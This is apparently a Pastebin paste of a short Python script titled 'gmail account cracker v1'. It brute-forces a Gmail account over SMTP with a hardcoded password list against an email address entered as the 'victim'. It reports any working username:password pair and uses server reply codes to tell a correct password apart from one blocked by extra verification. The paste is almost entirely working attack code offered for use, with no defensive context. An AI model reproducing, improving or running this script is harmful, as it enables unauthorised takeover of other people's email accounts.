BornePlays

gmail account cracker v1

May 29th, 2016
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.51 KB | None | 0 0
  1.  
  2. import smtplib, time, sys
  3.  
  4. try:
  5. server = smtplib.SMTP('smtp.gmail.com',587)
  6. server.ehlo()
  7. server.starttls()
  8. except:
  9. print('[!] Error Connecting to SMTP Server')
  10. time.sleep(5)
  11. sys.exit()
  12.  
  13. passwords = ['password', 'admin', 'adminsitator', 'CasperTheCat13375', 'passwords', 'godlover', 'adminstatorlogin',
  14. 'pass1337', 'location', 'muslim', 'password10', 'mylovelycat', 'justinBieber', 'crackingMe', 'catanddoglover',
  15. 'ilovejesus', 'willgodeverbemyfriend', 'PaSssword']
  16. amount = len(passwords)
  17.  
  18. def bruteForce():
  19. print('[*] Status: Cracking ('+str(amount)+') passwords')
  20. for password in passwords:
  21. time.sleep(1)
  22. try:
  23. server.login(username, password)
  24. combination = (username+':'+password)
  25. print('[*] Combination Found: %s' %combination)
  26. break
  27. except smtplib.SMTPAuthenticationError as msg:
  28. if msg.smtp_code == 534:
  29. print('[534] Password correct email verification is enabled (%s)' %password)
  30. elif msg.smtp_code == 535:
  31. print('[535] Incorrect password (%s)' %password)
  32. print('[*] Status: Finished!')
  33. time.sleep(5)
  34. sys.exit()
  35.  
  36.  
  37. print '''
  38. *** GOOGLE MAIL ACCOUNT CRACKER ***
  39. example: JoeyEssex@gmail.com
  40. Add passwords to crack by viewing source
  41. If error 534 victim will receive email for login attempt
  42.  
  43. '''
  44.  
  45. username = raw_input('[*] Victim Email: ')
  46. bruteForce()
Add Comment
Please, Sign In to add comment